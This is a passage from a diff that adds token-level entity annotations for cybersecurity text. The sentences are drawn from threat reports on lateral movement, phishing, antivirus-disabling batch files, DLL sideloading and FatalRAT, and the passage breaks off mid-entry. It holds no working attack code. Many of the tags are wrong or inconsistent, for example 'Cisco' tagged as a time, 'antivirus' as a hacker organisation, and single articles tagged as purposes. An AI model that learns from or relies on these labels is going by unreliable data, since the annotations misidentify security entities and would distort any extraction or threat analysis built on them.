"SMB", + "and", + "Windows", + "Service", + "Creation,", + "respectively,", + "on", + "several", + "target", + "Workstations." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "execute", + "a", + "payload", + "via", + "SMB", + "and", + "Windows", + "Service", + "Creation,", + "respectively,", + "on", + "a", + "target", + "DC." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "execute", + "a", + "payload", + "via", + "Windows", + "Service", + "Creation", + "on", + "target", + "workstations", + "and", + "the", + "DC." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "team", + "used", + "the", + "organization’s", + "MDM", + "system", + "to", + "gain", + "root", + "access", + "to", + "machines", + "across", + "the", + "organization’s", + "network", + "without", + "being", + "detected." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "krbtgt", + "account", + "is", + "a", + "domain", + "default", + "account" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Use", + "of", + "non-secure", + "default", + "configurations" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "organization", + "used", + "default", + "configurations", + "for", + "hosts", + "with", + "Windows", + "Server", + "2012", + "R2." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "default", + "configuration", + "allows", + "unprivileged", + "users", + "to", + "query", + "group", + "membership", + "of", + "local", + "administrator", + "groups" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "red", + "team", + "used", + "and", + "identified", + "several", + "standard", + "user", + "accounts", + "with", + "administrative", + "access", + "from", + "a", + "Windows", + "Server", + "2012", + "R2", + "SharePoint", + "server." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "team", + "discovered", + "several", + "standard", + "user", + "accounts", + "that", + "have", + "local", + "administrator", + "access", + "to", + "critical", + "servers." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "misconfiguration", + "allowed", + "the", + "team", + "to", + "use", + "the", + "low-level", + "access", + "of", + "a", + "phished", + "user", + "to", + "move", + "laterally", + "to", + "an", + "Unconstrained", + "Delegation", + "host", + "and", + "compromise", + "the", + "entire", + "domain." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "If", + "a", + "user", + "with", + "administrative", + "access", + "is", + "compromised,", + "an", + "actor", + "can", + "access", + "servers", + "without", + "needing", + "to", + "elevate", + "privileges" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "workstations", + "allowed", + "unprivileged", + "accounts", + "to", + "have", + "local", + "administrator", + "access" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "keylogged", + "a", + "user", + "during", + "a", + "mandatory", + "password", + "change" + ], + "ner_tags": [ + "B-SamFile", + "B-Purp", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "spear", + "phishing", + "attachments." + ], + "ner_tags": [ + "I-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "spear", + "phishing", + "attachments", + "for", + "Initial", + "Access" + ], + "ner_tags": [ + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "As", + "attackers", + "can", + "quickly", + "change", + "spear", + "phishing", + "attachments" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "suspicious", + "email", + "attachments", + "or", + "other", + "phishing", + "techniques." + ], + "ner_tags": [ + "O", + "I-Way", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "modification", + "of", + "Registry", + "Keys/Startup", + "folder", + "for", + "persistence" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Using", + "valid", + "accounts" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "valid", + "accounts" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "protocols,", + "such", + "as", + "for", + "Remote", + "Desktop", + "Protocol" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool" + ] + }, + { + "tokens": [ + "used", + "to", + "download", + "files…" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "second", + "stage", + "payload,", + "which", + "was", + "later", + "determined", + "to", + "likely", + "be", + "the", + "penetration", + "testing", + "framework", + "\"Brute", + "Ratel,\"", + "was", + "then", + "downloaded", + "via", + "a", + "connection" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "“RClone”", + "was", + "downloaded", + "on", + "the", + "file", + "servers" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "which", + "allowed", + "the", + "threat", + "actor", + "to", + "move", + "freely", + "between", + "domains." + ], + "ner_tags": [ + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Two", + "\".bat\"", + "files", + "were", + "sent", + "throughout", + "the", + "organization." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "before", + "running", + "the", + "\".cmd\"", + "file", + "contained", + "within", + "the", + "ISO." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "this", + "CMD", + "file", + "calls", + "the", + "\"db\"", + "file.", + "In", + "both", + "samples," + ], + "ner_tags": [ + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + ".bat", + "files" + ], + "ner_tags": [ + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "USING", + "\".BAT\"", + "FILES" + ], + "ner_tags": [ + "B-Way", + "B-Way", + "B-Way" + ] + }, + { + "tokens": [ + "The", + "two", + "\".bat\"", + "files", + "that", + "were", + "sent" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cc.bat", + "is", + "a", + "simple", + "script" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "w.bat", + "as", + "viewed", + "through", + "the", + "bash", + "command", + "\"cat\":" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "these", + "are", + "the", + "same", + "commands", + "as", + "observed", + "in", + "the", + "\".bat\"", + "files:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Both", + "were", + "designed", + "to", + "turn", + "off", + "antivirus", + "and", + "anti-malware", + "software." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "B-HackOrg", + "O" + ] + }, + { + "tokens": [ + ".bat", + "files", + "designed", + "to", + "disable", + "Cisco", + "AMP", + "/", + "Microsoft", + "Defender" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "command", + "\"net", + "stop", + "Cisco", + "AMP\"." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Time", + "O" + ] + }, + { + "tokens": [ + "showing", + "the", + "“uninstall”", + "commands", + "for", + "Windows", + "Defender:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "DISABLING", + "ANTIVIRUS/MALWARE", + "SOFTWARE", + "USING", + "\".BAT\"", + "FILES" + ], + "ner_tags": [ + "B-Way", + "B-Way", + "B-SecTeam", + "B-SecTeam", + "B-Way", + "B-Way" + ] + }, + { + "tokens": [ + "were", + "both", + "designed", + "to", + "turn", + "off", + "Antivirus", + "and", + "Antimalware", + "software." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "designed", + "to", + "stop", + "Cisco", + "AMP." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stopping", + "Cisco", + "AMP", + "/", + "Disabling", + "Microsoft", + "Defender" + ], + "ner_tags": [ + "O", + "B-Time", + "O", + "O", + "O", + "O", + "B-Purp" + ] + }, + { + "tokens": [ + "From", + "the", + "two", + "phishing", + "emails,", + "both", + "attachments", + "contain", + "similar", + "malware." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "phishing", + "attachment", + "was", + "submitted", + "to", + "the", + "target", + "in", + "a", + "response", + "to", + "an", + "ongoing", + "conversation" + ], + "ner_tags": [ + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "When", + "downloaded,", + "the", + "initial", + "attachment", + "is", + "a", + "local", + "HTML", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "were", + "able", + "to", + "be", + "decrypted", + "by", + "leveraging", + "the", + "decryption", + "script" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "adds", + "itself", + "to", + "a", + "scheduled", + "task." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "emulated", + "C2", + "Server", + "is", + "now", + "running", + "an", + "HTTPS", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "shows", + "that", + "this", + "connection", + "was", + "likely", + "HTTPS" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "the", + "communication", + "is", + "consistent", + "with", + "HTTP/S", + "traffic." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "on", + "TCP", + "port", + "2222." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "most", + "of", + "the", + "connection", + "attempts", + "to", + "the", + "C2", + "IP’s", + "are", + "conducted", + "over", + "TCP", + "port", + "443." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Due", + "to", + "TCP", + "port", + "2222’s", + "common", + "use", + "as", + "an", + "alternate", + "port", + "for", + "SSH", + "communication,", + "the", + "Malware", + "Analyst", + "recorded", + "a", + "manual", + "SSH", + "connection", + "to", + "the", + "emulated", + "C2", + "host" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "some", + "data", + "exfiltration", + "or", + "interaction", + "with", + "the", + "downloaded", + "second", + "stage", + "from", + "the", + "C2." + ], + "ner_tags": [ + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "show", + "the", + "transfer", + "of", + "files", + "using", + "SMB." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Files", + "commonly", + "observed", + "transferred", + "via", + "SMB", + "include" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Showing", + "the", + "Transfer", + "of", + "Cobalt", + "Strike", + "Beacons", + "using", + "RDPClip:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "allows", + "for", + "lateral", + "movement", + "leveraging", + "RPC", + "to", + "create", + "SMB", + "traffic." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "indicating", + "the", + "use", + "of", + "Remote", + "Desktop", + "Protocol.[" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Showing", + "the", + "Transfer", + "of", + "Cobalt", + "Strike", + "Beacons", + "using", + "RDPClip:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "the", + "use", + "of", + "RDP", + "by", + "the", + "Threat", + "Actor" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "second", + "encoded", + "Base64", + "string", + "was", + "not", + "only", + "base64", + "but", + "also", + "Gziped", + "for", + "size", + "and", + "obfuscation." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "has", + "some", + "simple", + "but", + "clever", + "obfuscation", + "in", + "place." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "shows", + "the", + "decoded", + "and", + "uncompressed", + "data." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "payload", + "decoder", + "from", + "Github" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "to", + "decode", + "the", + "body" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Task", + "manager", + "was", + "then", + "use", + "to", + "reveal", + "the", + "service", + "running", + "on", + "PID", + "3488," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg" + ] + }, + { + "tokens": [ + "requests", + "using", + "RC4", + "encryption" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "was", + "abused", + "by", + "the", + "attacker", + "to", + "steal", + "client", + "data." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "the", + "malware", + "copied", + "itself", + "to", + "\"$CURRENTUSER\\AppData\\Roaming\\Microsoft\\Isoaahffo\\djkuuhd.dll,\"", + "as", + "confirmed", + "by", + "the", + "file's", + "hashes", + "shown", + "below,", + "and", + "sets", + "itself", + "to", + "auto", + "run." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "process", + "imbedded", + "itself", + "into", + "wermgr.exe,", + "the", + "Windows", + "Error", + "Reporting", + "Manager", + "(Process", + "ID", + "6660)." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "uses", + "a", + "mixture", + "of", + "disguising", + "the", + "ASCII", + "as", + "UTF-16", + "via", + "manipulating", + "the", + "start", + "of", + "the", + "file,", + "as", + "well", + "as", + "obfuscating", + "the", + "data", + "using", + "a", + "simple", + "cypher." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "running", + "the", + "malware", + "sets", + "itself", + "up", + "as", + "the", + "service" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "after", + "reaching", + "the", + "local", + "DC,", + "the", + "attacker", + "was", + "able", + "to", + "gain", + "a", + "better", + "lay", + "of", + "the", + "land", + "and", + "observe", + "the", + "presence", + "of", + "the", + "other", + "two", + "domains." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "technique", + "leveraging", + "the", + "Windows", + "Management", + "Instrumentation", + "(WMI)", + "service", + "to", + "execute", + "malicious", + "code." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "indicating", + "that", + "the", + "user", + "deleted", + "the", + "collected", + "data." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "group", + "utilizes", + "sideloading" + ], + "ner_tags": [ + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "DLL", + "for", + "sideloading" + ], + "ner_tags": [ + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "group", + "uses", + "DLL", + "sideloading" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "detect", + "and", + "remove", + "Alibaba", + "Cloud", + "Security", + "from", + "compromised", + "instances" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "relied", + "on", + "their", + "victims", + "to", + "execute", + "the", + "malicious", + "MSI", + "installers" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "cmd.exe", + "to", + "download", + "files", + "from", + "Alibaba", + "Cloud", + "Object", + "Storage", + "Service." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executes", + "OSSUTIL", + "(included", + "in", + "the", + "installer", + "package", + "as", + "ssu.exe)", + "to", + "download", + "files" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "use", + "API", + "calls", + "such", + "as", + "VirtualAlloc", + "to", + "load", + "and", + "execute", + "malicious", + "components", + "into", + "memory" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Features", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "invokes", + "the", + "Windows", + "API", + "function", + "DisableThreadLibraryCalls" + ], + "ner_tags": [ + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "create", + "scheduled", + "tasks", + "to", + "achieve", + "persistence" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Create", + "scheduled", + "tasks", + "to", + "execute", + "the", + "loader", + "and", + "updater", + "components" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "scheduled", + "tasks", + "created", + "for", + "the", + "updater," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "four", + "scheduled", + "tasks", + "are", + "created:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "creates", + "a", + "registry", + "Run", + "key", + "to", + "achieve", + "persistence" + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "use", + "various", + "encryption", + "algorithms", + "to", + "hide", + "payloads", + "and", + "strings." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "execute", + "an", + "encrypted", + "payload", + "located", + "in", + "the", + "embedded", + "DLL" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "contains", + "an", + "XOR-encrypted", + "payload,", + "divided", + "into", + "three", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encrypted", + "with", + "a", + "different,", + "single", + "byte", + "XOR", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "use", + "dynamic", + "API", + "resolution", + "to", + "avoid", + "detection." + ], + "ner_tags": [ + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "calling", + "an", + "export", + "function", + "of", + "the", + "DLL" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "reconstructs", + "the", + "imports", + "table", + "of", + "the", + "DLL", + "and", + "calls", + "the", + "DllEntryPoint," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "the", + "DLL", + "will", + "find", + "the", + "address", + "of", + "an", + "export", + "function", + "called", + "SVP7,", + "which", + "contains", + "the", + "entry", + "point", + "of", + "the", + "malware," + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "DLL", + "side-loading", + "to", + "execute", + "their", + "malicious", + "payloads" + ], + "ner_tags": [ + "O", + "B-Way", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "side-loading", + "a", + "malicious", + "DLL,", + "libpng13.dll" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "B-SamFile" + ] + }, + { + "tokens": [ + "by", + "side-loading", + "dr.dll,", + "used", + "by", + "a", + "legitimate,", + "signed", + "binary" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + ",", + "side-loaded", + "by", + "the", + "same", + "legitimate", + "executable" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "contains", + "shellcode", + "and", + "an", + "embedded", + "DLL", + "file", + "that", + "loads", + "FatalRAT" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "contains", + "an", + "embedded", + "DLL" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "execute", + "an", + "encrypted", + "payload", + "located", + "in", + "the", + "embedded", + "DLL" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "has", + "keylogger", + "functionalities" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Capture", + "keystrokes" + ], + "ner_tags": [ + "B-Way", + "O" + ] + }, + { + "tokens": [ + "encrypts", + "data", + "with", + "a", + "custom", + "encryption", + "algorithm", + "before", + "it", + "is", + "sent", + "to", + "the", + "C&C", + "server." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "TCP", + "for", + "C&C", + "communications." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "exfiltrates", + "data", + "over", + "the", + "same", + "channel", + "used", + "for", + "C&C" + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Drop", + "a", + "file", + "named", + "ossutilconfig", + "in", + "the", + "%USERPROFILE%", + "directory" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Drop", + "and", + "execute", + "the", + "legitimate", + "installer", + "in", + "C:\\Program", + "Files\\Common", + "Files", + "(see", + "CommonFiles64Folder)." + ], + "ner_tags": [ + "B-Features", + "O", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "by", + "side-loading", + "dr.dll,", + "used", + "by", + "a", + "legitimate,", + "signed", + "binary" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "original", + "libpng13.dll", + "is", + "also", + "included", + "in", + "the", + "installer", + "package", + "(renamed", + "to", + "what", + "appears", + "to", + "be", + "a", + "random", + "name)", + "because", + "the", + "malicious", + "DLL", + "forwards", + "its", + "exported", + "functions", + "to", + "the", + "original", + "DLL." + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "download", + "files", + "from", + "an", + "attacker-controlled", + "bucket", + "in", + "Alibaba", + "Cloud" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "download", + "and", + "execute", + "further", + "shellcode" + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "obfuscated", + "the", + "loader", + "with", + "many", + "calls", + "to", + "a", + "function", + "that", + "just", + "prints", + "some", + "hardcoded", + "values" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "decrypt," + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "decrypts", + "the", + "payload", + "is", + "the", + "same", + "as", + "the", + "function", + "used", + "in", + "FatalRAT", + "to", + "decrypt", + "its", + "configuration" + ], + "ner_tags": [ + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypt", + "its", + "configuration", + "strings" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "decompiled", + "code", + "used", + "to", + "decrypt", + "strings" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Decompiled", + "code", + "of", + "a", + "function", + "used", + "by", + "a", + "FatalRAT" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "using", + "a", + "variety", + "of", + "software", + "packers" + ], + "ner_tags": [ + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + 